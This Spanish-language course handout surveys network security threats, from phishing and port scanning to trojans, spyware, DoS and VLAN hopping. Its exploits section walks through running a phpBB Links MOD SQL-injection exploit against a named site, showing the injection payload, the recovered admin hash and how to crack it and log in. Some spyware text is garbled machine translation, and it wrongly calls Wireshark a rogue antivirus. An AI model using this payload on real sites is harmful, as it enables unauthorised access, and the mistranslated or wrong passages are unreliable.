You are on page 1of 17

Seguridad Redes

Tipos de amenazas y ataques.

http://networkingtools.blogspot.com/

1
TABLA DE CONTENIDO

Ingeniería Social 3
Phishing 3
Escaneo de Puertos 4
Wardialers 5
Código Malicioso 5
Ataques de Contraseña 13
Control Remoto de Equipos 13
Eavesdropping 14
Desbordamiento de CAM 14
VLAN hopping 14
STP manipulation 15
Man-in-the-middle 15
Defacement 15
IP Spoofing - MAC Address Spoofing 15
Repetición de Transacción 15
Backdoors 15
DHCP Starvation 16
Trashing 16
Denegación de Servicio 16
Denegación de Servicio Distribuida 16
Fraude Informático 16
Software ilegal 16
Acceso a Información Confidencial Impresa 17
Daños Físicos al Equipamiento 17

2
PRINCIPALES AMENAZAS

Las amenazas a la seguridad de la información atentan contra su


confidencialidad, integridad y disponibilidad. Existen amenazas relacionadas
con falla humanas, con ataques malintencionados o con catástrofes naturales.
Mediante la materialización de una amenaza podría ocurrir el acceso
modificación o eliminación de información no autorizada; la interrupción de un
servicio o el procesamiento de un sistema; daños físicos o robo del
equipamiento y medios de almacenamiento de información.

Ingeniería Social

Consiste en utilizar artilugios, tretas y otras técnicas para el engaño de las


personas logrando que revelen información de interés para el atacante, como
ser contraseñas de acceso. Se diferencia del resto de las amenazas
básicamente porque no se aprovecha de debilidades y vulnerabilidades propias
de un componente informático para la obtención de información.

Un ejemplo de esta técnica es cuando alguien llama a su oficina y le pregunta a


una secretaria cuáles son los horarios del personal de Informática, y se hace
pasar por un funcionario del condominio donde están ubicadas las oficinas de
su empresa.

Phishing

Consiste en el envío masivo de mensajes electrónicos que fingen ser


notificaciones oficiales de entidades/empresas legítimas con el fin de obtener
datos personales y bancarios de los usuarios.

3
Escaneo de Puertos

Consiste en detectar qué servicios posee activos un equipo, con el objeto de


ser utilizados para los fines del atacante.

http://www.pablin.com.ar/computer/info/varios/scanning.htm

TCP connect() scanning: esta es la forma mas popular de escaneo TCP y


consiste básicamente en usar la llamada a sistema connect() del sistema
operativo, si se logra establecer la conexión con el puerto de la otra
computadora entonces este puerto esta abierto. Las ventajas que tiene esta
forma de escaneo es que no se necesita ningún privilegio especial para poder
llevarla a cabo, en la mayoría de los Unix cualquier usuario puede hacer uso de
la llamada connect(). Otra gran ventaja es la velocidad. El lado negativo que
encontramos es que es muy fácil de detectar y de filtrar, y generalmente el host
loguea que establecemos una conexión e inmediatamente nos desconectamos.
TCP SYN scanning: esta técnica es la llamada escaneo "half-open" (o mitad-
abierta), porque no establecemos una conexión TCP completa. Lo que
hacemos es enviar un paquete SYN como si fuéramos a entablar una conexión
TCP completa y esperamos por una respuesta. Podemos recibir un SYN|ACK
si el puerto esta escuchando o un RST si el puerto esta cerrado. Si recibimos
un SYN|ACK en respuesta, inmediatamente le enviamos un RST. La mayor
ventaja de esta técnica es que muy pocos servers nos loguean; y la desventaja
es que se necesita privilegios de root para construir estos paquetes SYN a
enviar.
TCP FIN scanning: algunos firewalls y packets filters escuchan por los
paquetes SYN en algunos puertos, y programas como el synlogger pueden
detectar este tipo de escaneo. En cambio los paquetes FIN pueden penetrar sin
mayor problemas. La idea consiste en que al enviar un paquete FIN si el puerto
esta cerrado nos va a devolver un RST, y si el puerto esta abierto nos va a
ignorar. Esto se debe a un error en las implementaciones TCP pero no funciona
en un 100%. La mayoría de los sistemas parecen susceptibles excepto los
sistemas Microsoft que son inmunes (aunque usted no lo crea).
Fragmentation scanning: esta no es una técnica en si misma, sino una
modificación de otras técnicas. Consiste en hacer una división de los paquetes
que enviamos, para no ser detectados por los packet filters y los firewalls. Por
ejemplo podemos hacer un SYN o un FIN scanning fragmentando los paquetes
que enviamos, y al ir quedando en cola en los firewalls y en los packet filters no
somos detectados.
TCP reverse ident scanning: el protocolo ident permite averiguar el nombre
de usuario y el dueño de cualquier servicio corriendo dentro de una conexión
TCP. Por ejemplo podemos conectarnos al puerto http y usar identd para
averiguar que esta corriendo la victima como root; esto solo es posible
estableciendo una conexión TCP completa.
FTP bounce attack: algo interesante del protocolo ftp, es que permite lo que
se llama conexión proxy ftp. O sea, yo podría conectarme a un ftp desde un
servidor proxy y al hacer esto establecer una conexión y enviar un archivo a
cualquier parte de la Internet.

4
Wardialers

Se trata de herramientas de software que utilizan el acceso telefónico de una


máquina para encontrar puntos de conexión telefónicos en otros equipos o
redes, con el objeto de lograr acceso o recabar información.

Aunque también se puede hacer con la antigua técnica de marcar a mano


todos los números. Algo un poco lento y muy cansado. (Aunque si se hace
desde una cabina es la forma más segura)

Hay distintos modelos de war-dialers cada uno con unas características


diferentes, pero básicamente todos hacen lo mismo, es decir; se encargan de
llamar a un gran número de números automáticamente, cosa que sería muy
molesta de realizar a mano, y localizar y anotar todos los números donde
aparezca algo que nos interese. Hay varios war-dialers en el mercado, pero
de los que se han sido el Toneloc programado por Muchos Maas y Minor
Threat y el THC-SCAN programado por Van Hauser (Grupo The Hacker
Choice),

 Código Malicioso / Virus

Se define como todo programa o fragmento del mismo que genera algún tipo
de problema en el sistema en el cual se ejecuta, interfiriendo de esta forma con
el normal funcionamiento del mismo. Existen diferentes tipos de código
malicioso; a continuación mencionamos algunos de ellos:

* Bombas lógicas

Se encuentran diseñados para activarse ante la ocurrencia de un evento


definido en su lógica. Por ejemplo, en el día de San Valentín o en el
aniversario de un evento importante: como la bomba lógica de
Chernobyl, que se activó el 26 de abril de 1999, cuando se cumplía el
13er aniversario del desastre nuclear.

Normalmente, las bombas lógicas se utilizan para lanzar ataques de


denegación de servicio al sobrepasar la capacidad de red de un sitio
Web, un servicio en línea o una compañía.

5
* Troyanos

Suele propagarse como parte de programas de uso común y se activan


cuando los mismos se ejecutan.

¿CÓMO SE UTILIZAN?

Se pueden utilizar de dos formas completamente distintas:

● Como herramienta de administración remota: que permite manipular


el sistema a distancia, ideal para personas que necesitan urgente un
archivo de la PC de su oficina y se encuentran en su casa. Se puede
considerar como tal solo cuando el usuario tenga el acceso permitido a
esa PC.
● Como herramienta para hackear: (Hackear: penetrar un sistema
informático sin acceso) esta es la forma de utilización que prefiere
cualquier persona con una conexión a Internet y ganas de espiar lo que
hace otra persona conectada a Internet o a su Red privada, también
llamada LAN (Local Area Network o Red de Area Local). Pudiendo
acceder a sus archivos confidenciales, contraseñas, recursos
compartidos, conversaciones que toman lugar en tiempo real, o borrar
archivos fundamentales tales como por ejemplo: COMMAND.COM
(dejando a la PC "víctima" sin poder arrancar, a menos que el usuario
"atacado" sepa iniciar desde un disco de rescate o de inicio.

EJEMPLOS DE TROYANOS

● NetBus: Este "troyano" o "herramienta de administración remota" fue


uno de los más difundidos en Internet, ganó un gran número de usuarios
adictos al programa por su sencillez de uso y la rapidez del mismo. El
tamaño del servidor (el encargado de permitir el acceso a la máquina
con o sin autorización) ahora parece grande en comparación con los
troyanos nuevos. Tamaño del servidor: 495 KB aproximadamente.

● Back Oriffice 2000: Sin lugar a duda el troyano que más pánico causó
en los últimos tiempos. Fue el preferido de todos por ser el primero que
salió en Internet con una facilidad de uso impresionante y características
que otros troyanos aun no imaginaban, como la renovada parte gráfica.
En la última versión del programa se puede notar que fue programado
para funciones de administración remota, ya que se nota la
programación estructurada y concisa, sin botones de más, ni funciones
innecesarias para el usuario final, la mejor versión hasta el momento.

6
● SubSeven: Otro troyano que causó un gran impacto, probablemente el
más usado en la actualidad, ya que el programa servidor ocupa menos
aun que el servidor del NetBus o el Back Oriffice. La parte gráfica es
distinta a las demás, la complementan un gran juego de "skins"
(texturas, colores, etc.) y mejor facilidad de uso, además incluye nuevas
funciones como la desconexión de Internet del equipo remoto, el cuelgue
del modem, el cambio de resolución de la pantalla, lista de los
passwords que se encuentran en el cache (las contraseñas que el
usuario escribió recientemente), y los passwords de la conexión
telefónica a redes, es decir la contraseña de internet. Tamaño del
servidor: 327 KB
● Cybersensor: Este troyano esta programado especialmente para
funcionar bajo WindowsNT. No es tan conocido como los anteriores.
Tamaño del servidor: 29.5 KB
● DeepThroat v2: Este programa también es bastante conocido, incluye
muchas funciones muy parecidas al resto de los troyanos, como la de
adquirir las contraseñas en el chache de la PC remota y las típicas
funciones del resto. Tamaño del servidor: 304 KB
● Dolly Trojan: Excelente troyano, lástima que no se ganó el aprecio del
público porque el servidor es muy grande. Evidentemente el
programador no tenía la experiencia necesaria.
● Girlfriend 1.35: Al contrario del Dolly Troyan este programa es muy
pequeño, al igual que su servidor, por lo tanto no incluye tantas
funciones.
● InCommand v1.0: Diferente a todos los demás este programa es de
tamaño medio, pero lamentablemente no pudo adquirir la atención del
usuario porque no tiene suficientes funciones. Tamaño del servidor: 168
KB
● NetSphere: Nuevamente, al igual que el Dolly este troyano posee un
servidor muy grande por lo que se hace pesado el envío por Internet o
por e-mail, lo que lleva a la gente a buscar algo menos pesado para
enviar, recurriendo a otro troyano. Tamaño del servidor: 621 KB
● Master Angel 97: Este troyano es uno de los menos conocidos, pero no
deja de ser muy bueno.

7
* Gusanos

Tienen el poder de auto duplicarse causando efectos diversos.

Las infecciones producidas por estos virus casi siempre se realizan a


través del correo electrónico, las redes informáticas y los canales de
Chat (tipo IRC o ICQ) de Internet. También pueden propagarse dentro
de la memoria del ordenador.
Estos son algunos ejemplos de gusanos: PSWBugbear.B, Lovgate.F,
Trile.C, Sobig.D, Mapson.

* Cookies

Son archivos de texto con información acerca de la navegación


efectuada por el usuario en Internet e información confidencial del mismo
que pueden ser obtenidos por atacantes.

* Keyloggers

Es una aplicación destinada a registrar todas las teclas que un usuario


tipea en su computadora; algunos de ellos además registran otro tipo de
información útil para un atacante, como ser, imágenes de pantalla.

http://www.viruslist.com/sp/analysis?pubid=207270921

El keylogger que se incrusta en el mismo teclado, el que se integra en el


cable que conecta el teclado y el ordenador y el que se incrusta en el
mismo ordenador. El más extendido es el segundo tipo de keylogger
hardware. Uno de los ejemplos más famosos es KeyGhost USB
Keylogger.

* Spyware

Aplicaciones que recogen y envían información sobre las páginas web


que más frecuentemente visita un usuario, tiempo de conexión, datos
relativos al equipo en el que se encuentran instalados (sistema
operativo, tipo de procesador, memoria, etc.) e, incluso, hay algunos
diseñados para informar de si el software que utiliza el equipo es original
o no.

Ejemplo:

Los programas se pueden agrupar en las “familias” basadas no en


código compartido del programa, sino en comportamientos comunes, o
“siguiendo el dinero” de las relaciones financieras o de negocios
evidentes. Por ejemplo, un número de los programas del spyware
distribuidos cerca Claria se conocen colectivamente como “Gator”.

8
● CoolWebSearch, un grupo de programas, se aprovecha de
vulnerabilidades del Internet Explorer. El paquete dirige tráfico a los
anuncios en Web site incluyendo coolwebsearch.com. Exhibe los
anuncios pop-up, reescrituras Search Engine los resultados, y alteran la
computadora infectada archivo de los anfitriones para dirigir DNS
operaciones de búsqueda a estos sitios.[24]
● Optimizador del Internet, también conocido como DyFuCa, vuelve a
dirigir las páginas del error del Internet Explorer a la publicidad. Cuando
los usuarios siguen un acoplamiento quebrado o incorporan un URL
erróneo, ven una página de anuncios. Sin embargo, porque los Web site
contraseña-protegidos (autentificación básica del HTTP) utilizan el
mismo mecanismo que errores del HTTP, el optimizador del Internet
hace imposible para que el usuario tenga acceso a sitios contraseña-
protegidos.[24]
● Zango (antes 180 soluciones) transmite la información detallada a los
publicistas sobre los Web site que los usuarios visitan. También altera
las peticiones del HTTP para afiliado los anuncios se ligaron de un Web
site, de modo que los anuncios hagan unearned el beneficio para la
compañía de 180 soluciones. Abre los anuncios pop-up que cubren
sobre los Web site de compañías competentes.[11]
● HuntBar, aka WinTools o Adware.Websearch, fue instalado por un
ActiveX conducir-por transferencia directa en los Web site del afiliado, o
por los anuncios exhibidos por el otro ejemplo de los programas-uno del
spyware de cómo el spyware puede instalar más spyware. Estos
programas agregan toolbars al IE, siguen comportamiento el hojear del
agregado, vuelven a dirigir referencias del afiliado, y exhiben los
anuncios.[25][26]
● Movieland, también conocido como Moviepass.tv o Popcorn.net, es
un servicio de la transferencia directa de la película que ha sido el tema
de millares de quejas a la Comisión comercial federal (FTC), Washington
Oficina del Procurador General de la República del estado, Oficina de un
negocio mejor, y otros por los consumidores que demandaban eran
rehén sostenido por su repetido ventanas pop-up y demandas para el
pago.[27] El FTC ha archivado a queja contra Movieland.com y once
otros demandados la carga de ellos con tener “enganchó a un esquema
a nivel nacional para utilizar engaño y coerción para extraer pagos de
consumidores. “La queja alega que el software abrió en varias ocasiones
las ventanas pop-up de gran tamaño que no podrían ser cerradas o no
redujeron al mínimo, acompañadas por la música que duró casi un
minuto, exigiendo el pago de por lo menos $29.95 para terminar el ciclo
pop-up; y demandar que los consumidores habían firmado para arriba
para un ensayo libre de tres días pero no canceló su calidad de miembro
antes del período de prueba encima, y fue obligada así para
pagar.[28][29]
9
Cuestiones legales relacionadas con el spyware

Derecho penal
El acceso desautorizado a una computadora es ilegal debajo delito
informático leyes, tales como los E.E.U.U. Fraude de computadora y acto
del abuso, los Reino Unido Acto del uso erróneo de la computadora y leyes
similares en otros países. Desde los dueños de las computadoras
infectadas con demanda del spyware generalmente que nunca autorizaron
la instalación, a a primera vista la lectura sugeriría que la promulgación del
spyware contara como acto criminal. La aplicación de ley ha perseguido a
menudo a los autores del otro malware, particularmente virus. Sin embargo,
se han procesado pocos reveladores del spyware, y muchos funcionan
abiertamente como negocios terminantemente legítimos, aunque algunos
han hecho frente a pleitos.[30][31]
Los productores de Spyware discuten que, contrariamente a las demandas
de los usuarios, los usuarios de hecho den consentimiento a las
instalaciones. Spyware que viene liado con usos del shareware se puede
describir en legalese texto del acuerdo de licencia del usuario final (EULA).
Muchos usuarios habitual no hacen caso de estos contratos pretendidos,
pero las compañías del spyware tales como Claria demandan éstos
demuestran que han consentido los usuarios.

Exploits

Se trata de programas o técnicas que explotan una vulnerabilidad de un


sistema para el logro de los objetivos del atacante, como ser, intrusión, robo de
información, denegación de servicio, etc. Son pequeños trozos de código (en
cualquier lenguaje) que están escritos para aprovecharse de vulnerabilidades
y/o errores específicos dentro de un sistema... para lograr acceder a él de
forma ilegítima o causar otro tipo de problemas. Hay que tener en cuenta
siempre que TODOS los software del mundo son desarrollados por humanos,
por lo tanto es normal encontrarse con errores en los códigos. Estos errores,
comúnmente llamados bugs, pueden ser del tipo desbordamiento de búfer
(buffer overflow), condición de carrera (race condition), errores de validación de
variables, etc, etc.

Ejemplos

http://xaviaffairs.blogspot.com/2007/10/ejemplo-de-funcionamiento-de-un-
exploit.html

phpBB Links MOD 1.2.2 Remote SQL Injection Exploit


El texto es bastante claro. El módulo "Links" del sistema de foros llamado
phpBB en su versión 1.2.2 es vulnerable a inyección SQL remota. Estos
significa que mediante la URL es posible interactuar directamente con la base
de datos (en este caso MySQL) para, entre otras cosas, obtener la password
de Administrador y poder loguearse como tal.

10
Este exploit no es muy largo (ya dijimos que son pequeños trozos de código
escritos para una vulnerabilidad específica) y está escrito en lenguaje PERL.
Por lo tanto para ejecutarlo habrá que tener PERL instalado en nuestras
máquinas. Los sistemas Linux/UNIX vienen con PERL.

Lo que se hace es copiar el código y guardarlo en un archivo con extensión .pl


(de PERL).

h4x0r@tarro:~/Desktop/exploit$ ls -lh
total 4,0K
-rw-r--r-- 1 h4x0r h4x0r 1,5K 2007-09-03 11:53 phpBB2.pl
h4x0r@tarro:~/Desktop/exploit$

y simplemente ejecutarlo. En este caso nos irá pidiendo los datos del sitio web
que queremos atacar. Pondré en rojo esto para diferenciarlo.

h4x0r@tarro:~/Desktop/exploit$ perl phpBB2.pl

phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit

Bug discovered by Don


Dork: allinurl:links.php?t=search
or: "Links MOD v1.2.2 by phpBB2.de"
SQL INJECTION: Exploit: links.php?t=search&search_keywords=
asd&start=1,1%20UNION%20SELECT%201,
username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20
phpbb_users%20WHERE%20user_id=2/*

=> Insert URL


=> without ( http )
=>
www.motoqueros.cl

=> Insert directory


=> es: /forum/ - /phpBB2/
=>
/foros/

=> User ID
=> Number:
=>
1

Exploit in process...
Exploit
in process...
Exploit finished!
MD5-Hash is: 827ccb0eea8a706c4c34a16891f84e7b

11
Y eso sería todo. El exploit fue capaz de conectarse a la base de datos y
recuperar el password cifrado del usuario con ID 1 (admin en este caso). Esta
cadena de 32 caracteres corresponde a un hash en md5. De mucho no nos
sirve tener la clave cifrada, pero podemos recuperarla atacándola con fuerza
bruta (o diccionario) en los siguientes sitios web:
http://md5.xpzone.de/
http://gdataonline.com/seekhash.php
Ponemos el hash y comprobamos la la clave de admin es 12345. Ahora
podemos loguearnos en http://www.sitioweb.com/foros/ usando estos datos.

Malwares

Wireshark Antivirus

Wireshark es una herramienta antivirus deshonesto ridículamente llamado


aplicación antivirus. Una vez que se consiga instalar en el equipo, te darás
cuenta del verdadero problema que puede ocasionar un malware, como limitar
el acceso a Internet restringiéndolo demasiado, redirecciones del navegador a
páginas infectadas y otros problemas.

12
 Ataques de Contraseña

Consiste en la prueba metódica de contraseñas para lograr el acceso a un


sistema, siempre y cuando la cuenta no presente un control de intentos fallidos
de logueo. Este tipo de ataques puede ser efectuado:
o Por diccionario: existiendo un diccionario de palabras, una herramienta
intentará acceder al sistema probando una a una las palabras incluidas en el
diccionario.
o Por fuerza bruta: una herramienta generará combinaciones de letras números
y símbolos formando posibles contraseñas y probando una a una en el login del
sistema.

Ejemplo:

Para llevar a cabo el análisis se pueden obtener los datos de dos órdenes
distintos:

* Diccionario: consiste en un archivo con una lista de las contraseñas más


comunes, se obtiene un acierto aproximado del 19.82%, con tan solo 100, un
10,34%.
.
* Rango: este método es más lento y no tiene sentido salvo se pretenda
encontrar la contraseña de un usuario determinado sin importar demasiado el
tiempo y el elevado número de intentos. Consiste en recorrer todas las
posibilidades de unas determinadas características. Por ejemplo, todos los
números del "000000" al "999999" o todas las combinaciones formadas entre
"aaaaaa" a "zzzzzz

Estos ataques se pueden dividir en dos tipos distintos: password guessing y


password cracking.

 Control Remoto de Equipos

Un atacante puede tomar el control de un equipo en forma remota y no


autorizada, mediante la utilización de programas desarrollados para tal fin, e
instalados por el atacante mediante, por ejemplo la utilización de troyanos.

Popular software de control remoto

Aunque VNC (Virtual Network Computing) sea únicamente conocido por los
administradores de redes como una herramienta de control remoto, nada
impide que se pueda modificar su código (licencia GNU). Según ha conocido
esta Redacción, algunas empresas españolas lo han manipulado para vigilar a
sus empleados, sin que ellos den su aprobación o tengan conocimiento. El
espionaje se basa en observar lo que tiene un empleado en pantalla en un
momento dado, para que el correspondiente departamento de personal evalúe
si el trabajador emplea exclusivamente su jornada de trabajo en temas
laborales.
13
 Eavesdropping

El eavesdropping es un proceso por el cual un atacante capta de información


(cifrada o no) que no le iba dirigida. Existen diferentes tipos de técnicas que
pueden utilizarse:

* Sniffing
Consiste en capturar paquetes de información que circulan por la red
con la utilización de una herramienta para dicho fin, instalada en un
equipo conectado a la red; o bien mediante un dispositivo especial
conectado al cable. En redes inalámbricas la captura de paquetes es
más simple, pues no requiere de acceso físico al medio.

Relacionados con este tipo de ataque, pueden distinguirse también las


siguientes técnicas:

- AIRsniffing: consiste en capturar paquetes de información que circulan por


redes inalámbricas. Para ello es necesario contar con una placa de red
"wireless" configurada en modo promiscuo y una antena.

- War Driving y Netstumbling: estas técnicas se valen del AIRsniffing, ya


que consisten en circular (generalmente en un vehículo) por un vecindario o
zona urbana, con el objeto de capturar información transmitida a través de
redes inalámbricas. Esto es posible debido a que generalmente las ondas de
transmisión de información en redes inalámbricas se expanden fuera del área
donde se ubican los usuarios legítimos de la red, pudiendo ser alcanzadas por
atacantes. Lo que en ocasiones las hace más vulnerables es la falta de
seguridad con que se encuentran implementadas.

Desbordamiento de CAM

Se trata de inundar la tabla de direcciones de un switch con el objeto de


bloquear la capacidad que éste posee de direccionar cada paquete
exclusivamente a su destino. De esta forma el atacante podrá efectuar sniffing
de los paquetes enviados por un switch, cuando en condiciones normales un
switch no es vulnerable a este tipo de ataques.

VLAN hopping

Las VLANs son redes LAN virtuales las cuales se implementan para generar un
control de tráfico entre las mismas, de forma que los equipos conectados a una
VLAN no posean acceso a otras. Este tipo de ataque pretende engañar a un
switch (sobre el cual se implementan VLANs) mediante técnicas de Switch
Spoofing logrando conocer los paquetes de información que circulan entre
VLANs.

14
STP manipulation

Este tipo de ataque es utilizado en topologías que cuentan con un árbol de


switches que implementan el protocolo Spanning Tree Protocol para coordinar
su comunicación. El equipo atacante buscará convertirse en la “raíz” de dicho
árbol, con el objeto de poder tener acceso a los paquetes de información que
circulan por todos los switches.

Man-in-the-middle

El atacante se interpone entre el origen y el destino en una comunicación


pudiendo conocer y/o modificar el contenido de los paquetes de información,
sin esto ser advertido por las víctimas. Esto puede ocurrir en diversos
ambientes, como por ejemplo, en comunicaciones por e-mail, navegación en
Internet, dentro de una red LAN, etc..

Defacement

Consiste en la modificación del contenido de un sitio web por parte de un


atacante.

IP Spoofing - MAC Address Spoofing

El atacante modifica la dirección IP o la dirección MAC de origen de los


paquetes de información que envía a la red, falsificando su identificación para
hacerse pasar por otro usuario. De esta manera, el atacante puede asumir la
identificación de un usuario válido de la red, obteniendo sus privilegios.

Repetición de Transacción

Consiste en capturar la información correspondiente a una transacción


efectuada en la red interna o en Internet, con el objeto de reproducirla
posteriormente. Esto cobra real criticidad en transacciones monetarias.

Backdoors

También denominados “puertas traseras”, consisten en accesos no


convencionales a los sistemas, los cuales pueden permitir efectuar acciones
que no son permitidas por vías normales. Generalmente son instalados por el
atacante para lograr un permanente acceso al sistema.

15
DHCP Starvation

El atacante busca reemplazar al servidor DHCP que se encuentra funcionando


en la red, de forma de asignar a los clientes direcciones IP y otra información
(como ser el servidor Gateway) de acuerdo a su conveniencia. De esta forma
podría luego simular ser el Gateway e interceptar la información que los
clientes envíen, con el tipo de ataque Man-in-the-middle.

Trashing

Consiste en la búsqueda de información dentro de la basura. Esto puede


representar una amenaza importante para usuarios que no destruyen la
información crítica o confidencial al eliminarla.

Denegación de Servicio

Su objetivo es degradar considerablemente o detener el funcionamiento de un


servicio ofrecido por un sistema o dispositivo de red. Existen diferentes técnicas
para la explotación de este tipo de ataques:

* Envío de paquetes de información mal conformados de manera de que la


aplicación que debe interpretarlo no puede hacerlo y colapsa.
* Inundación de la red con paquetes (como ser ICMP - ping, TCP – SYN, IP
origen igual a IP destino, etc.) que no permiten que circulen los paquetes de
información de usuarios.
* Bloqueo de cuentas por excesivos intentos de login fallidos.
* Impedimento de logueo del administrador.

Denegación de Servicio Distribuida

Su objetivo es el mismo que el perseguido por un ataque de denegación de


servicio común, pero en este caso se utilizan múltiples equipos para generar el
ataque.

Fraude Informático

Se trata del perjuicio económico efectuado a una persona mediante la


utilización de un sistema informático, ya sea, modificando datos, introduciendo
datos falsos o verdaderos o cualquier elemento extraño que sortee la seguridad
del sistema.

Software ilegal

Consiste en la instalación de software licenciado sin contar con la licencia


correspondiente que habilita su uso, o mediante la falsificación de la misma.

16
Acceso a Información Confidencial Impresa

Ocurre cuando información confidencial impresa es obtenida por personal no


autorizado debido a que la misma no es resguardada adecuadamente
mediante por ejemplo, una política de limpieza de escritorios.

Daños Físicos al Equipamiento

Los daños físicos pueden ser ocasionados por:

* Acciones intencionadas
* Negligencia de los usuarios (ej.: derrame de líquidos, golpes, etc.)
* Catástrofes naturales (ej.: fallas eléctricas, incendio, inundación.

17